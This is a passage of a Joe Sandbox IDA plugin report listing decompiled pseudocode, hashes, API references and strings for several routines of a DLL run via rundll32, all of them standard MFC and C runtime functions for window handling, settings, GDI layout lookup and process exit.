Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Window$Rect$ClientCtrlLongScreen
String ID:
API String ID: 1315500227-0
Opcode ID: 3db020920b72c671971993ae9780b3d492816d86ba5cd9127ef1e8eba5203929
Instruction ID: 9b9f6f1c131c314e5c19284c1e668e0a3a9e33f7fca6b6c160f9dd0f3207debf
Opcode Fuzzy Hash: 3db020920b72c671971993ae9780b3d492816d86ba5cd9127ef1e8eba5203929
Instruction Fuzzy Hash: 7A01623650056ABFDB129F569C48EEE37ADEF017D0F514115FD11EA161D730DA01DB90

Uniqueness

Uniqueness Score: -1.00%

Function 10022233 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10022233(intOrPtr* __ecx) {
				struct HWND__* _v40;
				struct HWND__* _v44;
				intOrPtr _v48;
				void* _v52;
				long _t34;
				long _t43;
				struct HWND__* _t48;
				intOrPtr* _t63;
				signed int _t64;
				void* _t69;
				intOrPtr _t71;
				intOrPtr* _t72;

				_t72 = __ecx;
				_t69 = E1001F7AE();
				if(_t69 != 0) {
					if( *((intOrPtr*)(_t69 + 0x1c)) == __ecx) {
						 *((intOrPtr*)(_t69 + 0x1c)) = 0;
					}
					if( *((intOrPtr*)(_t69 + 0x20)) == _t72) {
						 *((intOrPtr*)(_t69 + 0x20)) = 0;
					}
				}
				_t63 =  *((intOrPtr*)(_t72 + 0x44));
				if(_t63 != 0) {
					 *((intOrPtr*)( *_t63 + 0x50))();
					 *((intOrPtr*)(_t72 + 0x44)) = 0;
				}
				_t64 =  *(_t72 + 0x48);
				if(_t64 != 0) {
					 *((intOrPtr*)( *_t64 + 4))(1);
				}
				 *(_t72 + 0x48) =  *(_t72 + 0x48) & 0x00000000;
				if(( *(_t72 + 0x38) & 1) != 0) {
					_t71 =  *((intOrPtr*)(E100373DB() + 0x3c));
					if(_t71 != 0 &&  *(_t71 + 0x1c) != 0) {
						E10011C50( &_v52, 0, 0x30);
						_t48 =  *(_t72 + 0x1c);
						_v44 = _t48;
						_v40 = _t48;
						_v52 = 0x28;
						_v48 = 1;
						SendMessageA( *(_t71 + 0x1c), 0x405, 0,  &_v52);
					}
				}
				_t34 = GetWindowLongA( *(_t72 + 0x1c), 0xfffffffc);
				E1002204B(_t72);
				if(GetWindowLongA( *(_t72 + 0x1c), 0xfffffffc) == _t34) {
					_t43 =  *( *((intOrPtr*)( *_t72 + 0xf0))());
					if(_t43 != 0) {
						SetWindowLongA( *(_t72 + 0x1c), 0xfffffffc, _t43);
					}
				}
				E10022168(_t72);
				return  *((intOrPtr*)( *_t72 + 0x114))();
			}

APIs

SendMessageA.USER32 ref: 100222E9
GetWindowLongA.USER32 ref: 100222FB
GetWindowLongA.USER32 ref: 1002230C
SetWindowLongA.USER32 ref: 10022328

Strings

(, xrefs: 100222DF

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID: (
API String ID: 2178440468-3887548279
Opcode ID: a0256d8b5034a2fee01dc273fb99e3b5b93d09b5292866429bde14ed636a8408
Instruction ID: 74d92888995a03eb436cf4db0a6f1431d092ba1e50ceac8416b65ae125f9645e
Opcode Fuzzy Hash: a0256d8b5034a2fee01dc273fb99e3b5b93d09b5292866429bde14ed636a8408
Instruction Fuzzy Hash: 0C31AD34600615FFCB21DFA9E884A6EB7F8FF04250F52062DE5429B692CB31F848CB50

Uniqueness

Uniqueness Score: -1.00%

Function 10032286 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10032286(intOrPtr* __ecx, int _a4, signed int _a8, intOrPtr _a12) {
				void* __ebp;
				void* _t29;
				int _t30;
				void* _t35;
				void* _t38;
				intOrPtr* _t40;
				int _t42;
				intOrPtr* _t45;
				void* _t46;

				_t45 = __ecx;
				_t29 = E10022AD5(__ecx);
				_t40 =  *((intOrPtr*)(_t45 + 0x7c));
				_t42 = _a4;
				_t38 = _t29;
				if(_t40 == 0) {
					L2:
					if(_a8 != 0xffff) {
						if(_t42 == 0 || (_a8 & 0x00000810) != 0) {
							 *(_t45 + 0xa4) =  *(_t45 + 0xa4) & 0x00000000;
							goto L17;
						} else {
							if(_t42 < 0xf000 || _t42 >= 0xf1f0) {
								if(_t42 < 0xff00) {
									goto L13;
								}
								 *(_t45 + 0xa4) = 0xef1f;
								goto L17;
							} else {
								_t42 = (_t42 + 0xffff1000 >> 4) + 0xef00;
								L13:
								 *(_t45 + 0xa4) = _t42;
								L17:
								 *(_t38 + 0x38) =  *(_t38 + 0x38) | 0x00000040;
								L18:
								_t30 =  *(_t45 + 0xa4);
								if(_t30 ==  *((intOrPtr*)(_t45 + 0xa8))) {
									L21:
									return _t30;
								}
								_t30 = E100220EE(_t46, GetParent( *(_t45 + 0x1c)));
								if(_t30 == 0) {
									goto L21;
								}
								return PostMessageA( *(_t45 + 0x1c), 0x36a, 0, 0);
							}
						}
					}
					 *(_t45 + 0x38) =  *(_t45 + 0x38) & 0xffffffbf;
					if( *((intOrPtr*)(_t38 + 0x64)) != 0) {
						 *(_t45 + 0xa4) = 0xe002;
					} else {
						 *(_t45 + 0xa4) = 0xe001;
					}
					SendMessageA( *(_t45 + 0x1c), 0x362,  *(_t45 + 0xa4), 0);
					_t35 =  *((intOrPtr*)( *_t45 + 0x150))();
					if(_t35 != 0) {
						UpdateWindow( *(_t35 + 0x1c));
					}
					goto L18;
				}
				_t30 =  *((intOrPtr*)( *_t40 + 0x7c))(_t42, _a8, _a12);
				if(_t30 != 0) {
					goto L21;
				}
				goto L2;
			}

APIs

SendMessageA.USER32 ref: 100322EC
UpdateWindow.USER32(?), ref: 10032303
GetParent.USER32(?), ref: 1003236E
PostMessageA.USER32 ref: 1003238A

Strings

@, xrefs: 10032359

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Message$ParentPostSendUpdateWindow
String ID: @
API String ID: 4141989945-2766056989
Opcode ID: bad5658601269fb567b95f36ded4ee85d4dfb2814405908c13ec14e44f39eb87
Instruction ID: 6191196fd6615e40dc101e77c52f198469b7c7f61996bf1ea28baad2e91494f1
Opcode Fuzzy Hash: bad5658601269fb567b95f36ded4ee85d4dfb2814405908c13ec14e44f39eb87
Instruction Fuzzy Hash: 8D319635601B05EFEB22CF21CD48B5A77E5FF41352F258828E65A9E1A1C7B9A980DB01

Uniqueness

Uniqueness Score: -1.00%

Function 10034CE3 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E10034CE3(void* __ecx, void* __eflags) {
				intOrPtr _t18;
				intOrPtr* _t20;
				intOrPtr _t26;
				void* _t33;
				void* _t35;

				E10011BF0(0x1003a3fc, _t35);
				_push(__ecx);
				_t33 = __ecx;
				 *((intOrPtr*)(_t35 - 0x10)) = 0;
				E10034BFF(__ecx, 0x20, _t35 - 0x10);
				if( *((intOrPtr*)(_t35 + 8)) != 0 &&  *((intOrPtr*)(_t35 - 0x10)) == 0) {
					_t26 = E1001F77E(0x20);
					 *((intOrPtr*)(_t35 - 0x10)) = _t26;
					_t41 = _t26;
					 *(_t35 - 4) = 0;
					if(_t26 == 0) {
						_t20 = 0;
						__eflags = 0;
					} else {
						_push(0x1e);
						_push( *((intOrPtr*)(_t35 + 8)));
						_push("File%d");
						_push("Recent File List");
						_push(0);
						_t20 = E10024F0F(_t26, _t41);
					}
					 *(_t35 - 4) =  *(_t35 - 4) | 0xffffffff;
					 *((intOrPtr*)(_t33 + 0x84)) = _t20;
					 *((intOrPtr*)( *_t20 + 0x10))();
				}
				_t18 = E1003599F(_t33, "Settings", "PreviewPages", 0);
				 *((intOrPtr*)(_t33 + 0x90)) = _t18;
				 *[fs:0x0] =  *((intOrPtr*)(_t35 - 0xc));
				return _t18;
			}

APIs

__EH_prolog.LIBCMT ref: 10034CE8

Part of subcall function 10024F0F: __EH_prolog.LIBCMT ref: 10024F14

Strings

PreviewPages, xrefs: 10034D4B
Recent File List, xrefs: 10034D2A
Settings, xrefs: 10034D50
File%d, xrefs: 10034D25

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: H_prolog
String ID: File%d$PreviewPages$Recent File List$Settings
API String ID: 3519838083-526586445
Opcode ID: 932e69f2a25fdaf2d1d7247067e9866bd34830d2efb07ad355ada0066ba91e73
Instruction ID: 492fd1891bf7533495f0361d30171d8b100ab146b8dd749383e38376895f11d0
Opcode Fuzzy Hash: 932e69f2a25fdaf2d1d7247067e9866bd34830d2efb07ad355ada0066ba91e73
Instruction Fuzzy Hash: FA01B579A00605AFCB16EF649C05BEEBAB5FB84712F11861FF1569F281DF70A5408750

Uniqueness

Uniqueness Score: -1.00%

Function 10028BC6 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 25
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E10028BC6(void* __ecx, intOrPtr _a4) {
				struct HINSTANCE__* _t4;
				_Unknown_base(*)()* _t5;
				void* _t9;
				void* _t10;

				_t10 = __ecx;
				_t4 = GetModuleHandleA("GDI32.DLL");
				_t9 = 0;
				_t5 = GetProcAddress(_t4, "SetLayout");
				if(_t5 == 0) {
					if(_a4 != 0) {
						_t9 = 0xffffffff;
						SetLastError(0x78);
					}
				} else {
					_t9 =  *_t5( *((intOrPtr*)(_t10 + 4)), _a4);
				}
				return _t9;
			}

0x10028bcd
0x10028bcf
0x10028bdb
0x10028bdd
0x10028be5
0x10028bf8
0x10028bfc
0x10028bff
0x10028bff
0x10028be7
0x10028bf0
0x10028bf0
0x10028c09

APIs

GetModuleHandleA.KERNEL32(GDI32.DLL,?,?,10030BC6,00000000), ref: 10028BCF
GetProcAddress.KERNEL32(00000000,SetLayout), ref: 10028BDD
SetLastError.KERNEL32(00000078,?,?,10030BC6,00000000), ref: 10028BFF

Strings

SetLayout, xrefs: 10028BD5
GDI32.DLL, xrefs: 10028BC8

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: AddressErrorHandleLastModuleProc
String ID: GDI32.DLL$SetLayout
API String ID: 4275029093-2147214759
Opcode ID: f829d107276f7f8dc5ff7ef364a20be20c27fb831297046e44f9a224b6ca2c99
Instruction ID: de10e2654153e74bad07dc63c5cb2a97a5a293e8e121725d640a5f2c86b9b1e6
Opcode Fuzzy Hash: f829d107276f7f8dc5ff7ef364a20be20c27fb831297046e44f9a224b6ca2c99
Instruction Fuzzy Hash: 1AE02077105110BFD253875A9C48C5F7B62D7C4372B11C619F276D5090CB3188018721

Uniqueness

Uniqueness Score: -1.00%

Function 10028B90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E10028B90(signed int __ecx) {
				_Unknown_base(*)()* _t3;
				signed int _t7;
				signed int _t8;

				_t7 = __ecx;
				_t3 = GetProcAddress(GetModuleHandleA("GDI32.DLL"), "GetLayout");
				if(_t3 == 0) {
					_t8 = _t7 | 0xffffffff;
					SetLastError(0x78);
				} else {
					_t8 =  *_t3( *((intOrPtr*)(_t7 + 4)));
				}
				return _t8;
			}

0x10028b96
0x10028ba4
0x10028bac
0x10028bb9
0x10028bbc
0x10028bae
0x10028bb3
0x10028bb3
0x10028bc5

APIs

GetModuleHandleA.KERNEL32(GDI32.DLL,?,10030BB9), ref: 10028B98
GetProcAddress.KERNEL32(00000000,GetLayout), ref: 10028BA4
SetLastError.KERNEL32(00000078), ref: 10028BBC

Strings

GDI32.DLL, xrefs: 10028B91
GetLayout, xrefs: 10028B9E

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: AddressErrorHandleLastModuleProc
String ID: GDI32.DLL$GetLayout
API String ID: 4275029093-2396518106
Opcode ID: 8afe1690608ce82dbca3926b0a057167ce80ddde095d094937dead2d2ff1ddbb
Instruction ID: 54bc3d33d325d2134ddbcfb4761d493361e18e0aa1f1c781400aef32ec3f8dd9
Opcode Fuzzy Hash: 8afe1690608ce82dbca3926b0a057167ce80ddde095d094937dead2d2ff1ddbb
Instruction Fuzzy Hash: BBD05EB6A052346FDAA35BF5AC4CE5A7A54DB047B2B418669FD65EA1E0CB24CC008790

Uniqueness

Uniqueness Score: -1.00%

Function 10011DCF Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 13
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 68%

			E10011DCF(int _a4) {
				struct HINSTANCE__* _t3;
				_Unknown_base(*)()* _t4;

				_t3 = GetModuleHandleA("mscoree.dll");
				if(_t3 != 0) {
					_t4 = GetProcAddress(_t3, "CorExitProcess");
					if(_t4 != 0) {
						 *_t4(_a4);
					}
				}
				ExitProcess(_a4);
			}

0x10011dd4
0x10011ddc
0x10011de4
0x10011dec
0x10011df2
0x10011df2
0x10011dec
0x10011df8

APIs

GetModuleHandleA.KERNEL32(mscoree.dll,10011F3D,?,10041DB0,00000008,10011F63,?,00000001,00000000,10016CF1,00000003), ref: 10011DD4
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 10011DE4
ExitProcess.KERNEL32 ref: 10011DF8

Strings

mscoree.dll, xrefs: 10011DCF
CorExitProcess, xrefs: 10011DDE

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: AddressExitHandleModuleProcProcess
String ID: CorExitProcess$mscoree.dll
API String ID: 75539706-1276376045
Opcode ID: 3fc20c7666ee96b06c5226d441d543eb9b5fbec8a0200ca7e01eb325b998744c
Instruction ID: 44dc424d0b29a2a163b933457fd361873f6b0f507bf76f9d722852a62850aa7a
Opcode Fuzzy Hash: 3fc20c7666ee96b06c5226d441d543eb9b5fbec8a0200ca7e01eb325b998744c
Instruction Fuzzy Hash: F2D0C9B0604217AFEA429BB2CD48DEB3AA8EF406857108428F416D8021CF31CD019B11

Uniqueness

Uniqueness Score: -1.00%

Function 10018BEF Relevance: 7.7, APIs: 5, Instructions: 216
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E10018BEF(intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* __edi;
				void* __ebp;
				intOrPtr* _t89;
				void* _t90;
				void* _t101;
				intOrPtr _t112;
				void* _t115;
				signed int _t120;
				signed int _t125;
				intOrPtr _t132;
				intOrPtr _t133;
				void* _t138;
				intOrPtr _t140;
				signed int _t142;
				signed int _t143;
				signed int _t146;
				signed int _t147;
				signed int _t148;
				signed int _t149;
				signed int _t150;
				signed int _t152;
				void* _t159;
				intOrPtr _t162;
				signed int _t164;
				signed int _t165;
				void* _t168;
				void* _t169;
				void* _t170;
				void* _t172;
				intOrPtr* _t173;
				intOrPtr _t174;
				void* _t176;
				intOrPtr _t180;

				_t89 = _a4;
				_v12 = _v12 & 0x00000000;
				_t133 =  *((intOrPtr*)(_t89 + 4));
				_t162 =  *_t89;
				_v24 = _t162;
				_v20 = _t133;
				_t90 = E1001519D(_t162);
				_t174 = _t133;
				_t172 = _t90;
				if(_t174 < 0 || _t174 <= 0 && _t162 < 0) {
					L28:
					return 0;
				} else {
					_t176 = _t133 - 0x1000;
					if(_t176 > 0 || _t176 >= 0 && _t162 > 0) {
						goto L28;
					} else {
						if( *((intOrPtr*)(_t172 + 0x44)) != 0) {
							L9:
							_t173 =  *((intOrPtr*)(_t172 + 0x44));
							L10:
							_t142 = E10013780(_t162, _t133, 0x1e13380, 0) + 0x46;
							_t10 = _t142 + 0x12b; // 0xe5
							asm("cdq");
							_t15 = _t142 - 1; // -71
							_v16 = _t15;
							_v8 = _t142;
							asm("cdq");
							_t164 = 0x64;
							_t165 = 4;
							asm("cdq");
							_t28 = _v16 / _t165 - 0x11; // 0xd4
							asm("cdq");
							_t29 = _t142 - 0x46; // -140
							asm("cdq");
							_t101 = E100122A0(_t29, _v16 % _t165, 0xfffffe93, 0xffffffff);
							asm("sbb edx, ebx");
							_t138 = 0x15180;
							_t168 = _v24 + E100122A0(_t101 - _t10 / 0x190 - _t15 / _t164 + _t28, _v16 % _t165, 0x15180, 0);
							asm("adc [ebp-0x10], edx");
							_t180 = _v20;
							if(_t180 > 0 || _t180 >= 0 && _t168 >= 0) {
								asm("cdq");
								_t143 = 4;
								if(_v8 % _t143 != 0) {
									L19:
									asm("cdq");
									_t158 = (_v8 + 0x76c) % 0x190;
									if((_v8 + 0x76c) % 0x190 != 0) {
										goto L21;
									}
									goto L20;
								}
								asm("cdq");
								_t149 = 0x64;
								_t158 = _v8 % _t149;
								if(_v8 % _t149 != 0) {
									goto L20;
								}
								goto L19;
							} else {
								_t125 = _v16;
								_v8 = _t125;
								_t168 = _t168 + 0x1e13380;
								asm("adc dword [ebp-0x10], 0x0");
								asm("cdq");
								_t150 = 4;
								if(_t125 % _t150 != 0) {
									L15:
									asm("cdq");
									_t158 = (_v8 + 0x76c) % 0x190;
									if((_v8 + 0x76c) % 0x190 != 0) {
										L21:
										 *((intOrPtr*)(_t173 + 0x14)) = _v8;
										 *((intOrPtr*)(_t173 + 0x1c)) = E10013780(_t168, _v20, _t138, 0);
										asm("cdq");
										_t169 = _t168 + E100122A0(_t110, _t158, 0xfffeae80, 0xffffffff);
										asm("adc [ebp-0x10], edx");
										_t159 = 0x1004ce98;
										if(_v12 == 0) {
											_t159 = 0x1004cecc;
										}
										_t112 =  *((intOrPtr*)(_t173 + 0x1c));
										_t146 = 1;
										if( *((intOrPtr*)(_t159 + 4)) >= _t112) {
											L27:
											_t147 = _t146 - 1;
											 *(_t173 + 0x10) = _t147;
											 *((intOrPtr*)(_t173 + 0xc)) = _t112 -  *((intOrPtr*)(_t159 + _t147 * 4));
											_t115 = E10013780( *_a4,  *((intOrPtr*)(_a4 + 4)), _t138, 0);
											_t148 = 7;
											asm("cdq");
											 *(_t173 + 0x18) = (_t115 + 4) % _t148;
											 *((intOrPtr*)(_t173 + 8)) = E10013780(_t169, _v20, 0xe10, 0);
											asm("cdq");
											_t170 = _t169 + E100122A0(_t118, (_t115 + 4) % _t148, 0xfffff1f0, 0xffffffff);
											asm("adc [ebp-0x10], edx");
											_t120 = E10013780(_t170, _v20, 0x3c, 0);
											 *(_t173 + 4) = _t120;
											 *_t173 = _t170 - _t120 * 0x3c;
											 *((intOrPtr*)(_t173 + 0x20)) = 0;
											return _t173;
										} else {
											_t140 = _t112;
											do {
												_t146 = _t146 + 1;
											} while ( *((intOrPtr*)(_t159 + _t146 * 4)) < _t140);
											_t138 = 0x15180;
											goto L27;
										}
									}
									L16:
									_t168 = _t168 + _t138;
									asm("adc dword [ebp-0x10], 0x0");
									L20:
									_v12 = 1;
									goto L21;
								}
								asm("cdq");
								_t152 = 0x64;
								_t158 = _v8 % _t152;
								if(_v8 % _t152 != 0) {
									goto L16;
								}
								goto L15;
							}
						}
						_t132 = E100107B6(0x24);
						 *((intOrPtr*)(_t172 + 0x44)) = _t132;
						if(_t132 != 0) {
							goto L9;
						}
						_t173 = 0x1004f744;
						goto L10;
					}
				}
			}

APIs

Part of subcall function 1001519D: GetLastError.KERNEL32(?,00000000,100136FA,100139FA,00000000,10041E50,00000008,10013A51,?,?,?,10015293,0000000D,10041EB0,00000010,10015375), ref: 1001519F
Part of subcall function 1001519D: FlsGetValue.KERNEL32(?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000,?,?,10011379,?,?,?,10041D40), ref: 100151AD
Part of subcall function 1001519D: FlsSetValue.KERNEL32(00000000,?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000,?,?,10011379,?,?,?), ref: 100151D4
Part of subcall function 1001519D: GetCurrentThreadId.KERNEL32 ref: 100151EC
Part of subcall function 1001519D: SetLastError.KERNEL32(00000000,?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000,?,?,10011379,?,?,?), ref: 10015203

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10018C61
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10018D5E
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10018DB7
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10018DD4
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10018DF7

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$ErrorLastValue$CurrentThread
String ID:
API String ID: 223281555-0
Opcode ID: 1693e817e5266281a194762ea474d98223fd442ae3dcdc5ad9847de1fdbd58a6
Instruction ID: 428b4c813f629567aa63a678bca7b6061bdb39fa1b2836493da5e96e2c7cad82
Opcode Fuzzy Hash: 1693e817e5266281a194762ea474d98223fd442ae3dcdc5ad9847de1fdbd58a6
Instruction Fuzzy Hash: 3361B1B6A00306ABD714DEA9CC41BAEB3F6EB84354F25452DF5119B2C1D7B5EB808B50

Uniqueness

Uniqueness Score: -1.00%

Function 1002D821 Relevance: 7.7, APIs: 5, Instructions: 204
windowCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E1002D821(intOrPtr __ecx, void* __edx) {
				void* __ebx;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				signed char _t75;
				signed int _t80;
				signed int _t81;
				signed int _t85;
				signed int _t87;
				void* _t95;
				intOrPtr _t125;
				intOrPtr _t133;
				void* _t147;
				void* _t151;
				intOrPtr _t155;
				void* _t158;
				void* _t160;

				_t147 = __edx;
				_t158 = _t160 - 0xb0;
				_t70 =  *0x1004c470; // 0x12db9c4b
				_t155 =  *((intOrPtr*)(_t158 + 0xb8));
				 *((intOrPtr*)(_t158 + 0xac)) = _t70;
				_t125 = __ecx;
				_t72 = GetWindowRect( *(_t155 + 0x1c), _t158 - 0x80);
				if( *((intOrPtr*)(_t155 + 0x88)) != _t125 ||  *(_t158 + 0xbc) != 0 && EqualRect(_t158 - 0x80,  *(_t158 + 0xbc)) == 0) {
					if( *((intOrPtr*)(_t125 + 0x90)) != 0 && ( *(_t155 + 0x80) & 0x00000040) != 0) {
						 *(_t125 + 0x7c) =  *(_t125 + 0x7c) | 0x00000040;
					}
					 *(_t125 + 0x7c) =  *(_t125 + 0x7c) & 0xfffffff9;
					_t75 =  *(_t155 + 0x7c) & 0x00000006 |  *(_t125 + 0x7c);
					 *(_t125 + 0x7c) = _t75;
					if((_t75 & 0x00000040) == 0) {
						_push(0x104);
						_push(_t158 - 0x58);
						E1002095F(_t155);
						E10029B23(_t155,  *((intOrPtr*)(_t125 + 0x1c)), _t158 - 0x58);
					}
					_t80 = ( *(_t155 + 0x7c) ^  *(_t125 + 0x7c)) & 0x0000f000 ^  *(_t155 + 0x7c) | 0x00000f00;
					if( *((intOrPtr*)(_t125 + 0x90)) == 0) {
						_t81 = _t80 & 0xfffffffe;
					} else {
						_t81 = _t80 | 0x00000001;
					}
					E100383D0(_t155, _t81);
					 *((intOrPtr*)(_t158 - 0x6c)) = 0;
					if( *((intOrPtr*)(_t155 + 0x88)) != _t125 && IsWindowVisible( *(_t155 + 0x1c)) != 0) {
						E100204FE(_t155, 0, 0, 0, 0, 0, 0x97);
						 *((intOrPtr*)(_t158 - 0x6c)) = 1;
					}
					 *(_t158 - 0x70) =  *(_t158 - 0x70) | 0xffffffff;
					if( *(_t158 + 0xbc) == 0) {
						_t57 = _t125 + 0x94; // 0x94
						_t150 = _t57;
						E1001E2BE(_t57, _t158,  *((intOrPtr*)(_t57 + 8)), _t155);
						E1001E2BE(_t150, _t158,  *((intOrPtr*)(_t150 + 8)), 0);
						_t85 =  *0x1004efa4; // 0x2
						_t151 = 0;
						_t87 =  *0x1004efa0; // 0x2
						E100204FE(_t155, 0,  ~_t87,  ~_t85, 0, 0, 0x115);
					} else {
						CopyRect(_t158 - 0x68,  *(_t158 + 0xbc));
						E10028E5A(_t125, _t158 - 0x68);
						asm("cdq");
						asm("cdq");
						_push(( *((intOrPtr*)(_t158 - 0x5c)) -  *((intOrPtr*)(_t158 - 0x64)) - _t147 >> 1) +  *((intOrPtr*)(_t158 - 0x64)));
						_push(( *((intOrPtr*)(_t158 - 0x60)) -  *(_t158 - 0x68) - _t147 >> 1) +  *(_t158 - 0x68));
						_push( *((intOrPtr*)(_t158 + 0xb8)));
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						 *(_t158 - 0x70) = E1002CE2A(_t125);
						E100204FE( *((intOrPtr*)(_t158 + 0xb8)), 0,  *(_t158 - 0x68),  *((intOrPtr*)(_t158 - 0x64)),  *((intOrPtr*)(_t158 - 0x60)) -  *(_t158 - 0x68),  *((intOrPtr*)(_t158 - 0x5c)) -  *((intOrPtr*)(_t158 - 0x64)), 0x114);
						_t155 =  *((intOrPtr*)(_t158 + 0xb8));
						_t151 = 0;
					}
					if(E100220EE(_t158, GetParent( *(_t155 + 0x1c))) != _t125) {
						E1000870E(_t155, _t125);
					}
					_t133 =  *((intOrPtr*)(_t155 + 0x88));
